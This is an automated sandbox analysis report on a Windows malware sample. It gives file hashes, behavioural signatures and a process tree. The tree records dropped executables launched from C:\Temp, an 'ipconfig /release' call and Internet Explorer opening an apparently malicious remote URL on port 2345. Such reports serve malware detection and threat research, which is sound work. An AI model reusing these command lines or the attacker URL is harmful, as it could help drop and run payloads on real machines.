Analysis

  • max time kernel
    148s
  • max time network
    180s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    03-12-2022 17:59

General

  • Target

    8499809f4b3f8f8ac2fa568c2d762d162b8376610e112339512aaad9f382b504.exe

  • Size

    361KB

  • MD5

    83c4c622187ef9cd7b756c27281e0608

  • SHA1

    5f59b4f46fdf971f127545f2658af7b802e5f4fe

  • SHA256

    8499809f4b3f8f8ac2fa568c2d762d162b8376610e112339512aaad9f382b504

  • SHA512

    418ced6a56d3ebf45058bb0d1133eb9597c15dd6d823d0af435735d63382ae706a5f0edb34673ada9ecbbf25cbd8252dc10197177c382ae93a04ff4c367c2e6a

  • SSDEEP

    6144:eflfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:eflfAsiVGjSGecvX

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 4 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8499809f4b3f8f8ac2fa568c2d762d162b8376610e112339512aaad9f382b504.exe
    "C:\Users\Admin\AppData\Local\Temp\8499809f4b3f8f8ac2fa568c2d762d162b8376610e112339512aaad9f382b504.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1848
    • C:\Temp\vupgeaytsjecbwvq.exe
      C:\Temp\vupgeaytsjecbwvq.exe run
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\temp\CreateProcess.exe
        C:\temp\CreateProcess.exe C:\Temp\vrokkgdrnn.exe ups_run
        3⤵
        • Executes dropped EXE
        PID:576
        • C:\Temp\vrokkgdrnn.exe
          C:\Temp\vrokkgdrnn.exe ups_run
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1664
          • C:\temp\CreateProcess.exe
            C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
            5⤵
            • Executes dropped EXE
            PID:560
            • C:\windows\system32\ipconfig.exe
              C:\windows\system32\ipconfig.exe /release
              6⤵
              • Gathers network information
              PID:1516
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1320
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1320 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1136

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Temp\CreateProcess.exe

    Filesize

    3KB

    MD5

    1f21688ce0a7888878d4a097049b28cb

    SHA1

    6103dd2ffc369d56d176633764ff073881ff1a3d

    SHA256

    ef06b0cb906e3bcb4d6f234198c10c680545a38ef438de9aca14208f6589821a

    SHA512

    a77cc000bc59e9fd6076d21435ebf70f72e69b26bba43dc14c4539502cd6af25c80123df140cdaa79b4e8bd8fd7ee3c4f7807bedfa6905d821b5612e0c5ff2d2

  • C:\Temp\CreateProcess.exe

    Filesize

    3KB

    MD5

    1f21688ce0a7888878d4a097049b28cb

    SHA1

    6103dd2ffc369d56d176633764ff073881ff1a3d

    SHA256

    ef06b0cb906e3bcb4d6f234198c10c680545a38ef438de9aca14208f6589821a

    SHA512

    a77cc000bc59e9fd6076d21435ebf70f72e69b26bba43dc14c4539502cd6af25c80123df140cdaa79b4e8bd8fd7ee3c4f7807bedfa6905d821b5612e0c5ff2d2

  • C:\Temp\vrokkgdrnn.exe

    Filesize

    361KB

    MD5

    8bce9db40a7db60e6747caec76f33734

    SHA1

    07b0e132c2719672daf63684ae43ffdd36db0674

    SHA256

    fe9192a6da0693cb5c433555afe68dba297fa6a1c4682c9a4f4d99200542a848

    SHA512

    d4d0b777e1eeeec8184b85fc355b11124c08f9f9ec48c30c936e46886f6aedd2e7055c88632520770871f812fac8f3a9e48cbd2cf6864a90370e373231634160

  • C:\Temp\vupgeaytsjecbwvq.exe

    Filesize

    361KB

    MD5

    8a1c9f6b8cd710fc4be2602452ffef38

    SHA1

    45c580d7176ce9442d389b8bf2825534ee7fb228

    SHA256

    a7ea27ed13cc3091e7b7cea56bbb3370576c3756e018c7c368c1b25e6f5b8d3f

    SHA512

    269fc28f7d225180990cad264342b60be7427914ef619df9d48e22516d4b5f005efa1c549642b7cf0bde171c6f383c20f9f417e240e68b3b46f7d88d72c27769

  • C:\Temp\vupgeaytsjecbwvq.exe

    Filesize

    361KB

    MD5

    8a1c9f6b8cd710fc4be2602452ffef38

    SHA1

    45c580d7176ce9442d389b8bf2825534ee7fb228

    SHA256

    a7ea27ed13cc3091e7b7cea56bbb3370576c3756e018c7c368c1b25e6f5b8d3f

    SHA512

    269fc28f7d225180990cad264342b60be7427914ef619df9d48e22516d4b5f005efa1c549642b7cf0bde171c6f383c20f9f417e240e68b3b46f7d88d72c27769

  • C:\temp\CreateProcess.exe

    Filesize

    3KB

    MD5

    1f21688ce0a7888878d4a097049b28cb

    SHA1

    6103dd2ffc369d56d176633764ff073881ff1a3d

    SHA256

    ef06b0cb906e3bcb4d6f234198c10c680545a38ef438de9aca14208f6589821a

    SHA512

    a77cc000bc59e9fd6076d21435ebf70f72e69b26bba43dc14c4539502cd6af25c80123df140cdaa79b4e8bd8fd7ee3c4f7807bedfa6905d821b5612e0c5ff2d2

  • \Temp\CreateProcess.exe

    Filesize

    3KB

    MD5

    1f21688ce0a7888878d4a097049b28cb

    SHA1

    6103dd2ffc369d56d176633764ff073881ff1a3d

    SHA256

    ef06b0cb906e3bcb4d6f234198c10c680545a38ef438de9aca14208f6589821a

    SHA512

    a77cc000bc59e9fd6076d21435ebf70f72e69b26bba43dc14c4539502cd6af25c80123df140cdaa79b4e8bd8fd7ee3c4f7807bedfa6905d821b5612e0c5ff2d2

  • \Temp\CreateProcess.exe

    Filesize

    3KB

    MD5

    1f21688ce0a7888878d4a097049b28cb

    SHA1

    6103dd2ffc369d56d176633764ff073881ff1a3d

    SHA256

    ef06b0cb906e3bcb4d6f234198c10c680545a38ef438de9aca14208f6589821a

    SHA512

    a77cc000bc59e9fd6076d21435ebf70f72e69b26bba43dc14c4539502cd6af25c80123df140cdaa79b4e8bd8fd7ee3c4f7807bedfa6905d821b5612e0c5ff2d2

  • \Temp\CreateProcess.exe

    Filesize

    3KB

    MD5

    1f21688ce0a7888878d4a097049b28cb

    SHA1

    6103dd2ffc369d56d176633764ff073881ff1a3d

    SHA256

    ef06b0cb906e3bcb4d6f234198c10c680545a38ef438de9aca14208f6589821a

    SHA512

    a77cc000bc59e9fd6076d21435ebf70f72e69b26bba43dc14c4539502cd6af25c80123df140cdaa79b4e8bd8fd7ee3c4f7807bedfa6905d821b5612e0c5ff2d2

  • \Temp\vupgeaytsjecbwvq.exe

    Filesize

    361KB

    MD5

    8a1c9f6b8cd710fc4be2602452ffef38

    SHA1

    45c580d7176ce9442d389b8bf2825534ee7fb228

    SHA256

    a7ea27ed13cc3091e7b7cea56bbb3370576c3756e018c7c368c1b25e6f5b8d3f

    SHA512

    269fc28f7d225180990cad264342b60be7427914ef619df9d48e22516d4b5f005efa1c549642b7cf0bde171c6f383c20f9f417e240e68b3b46f7d88d72c27769

  • memory/560-65-0x0000000000000000-mapping.dmp

  • memory/576-61-0x0000000000000000-mapping.dmp

  • memory/2044-55-0x0000000000000000-mapping.dmp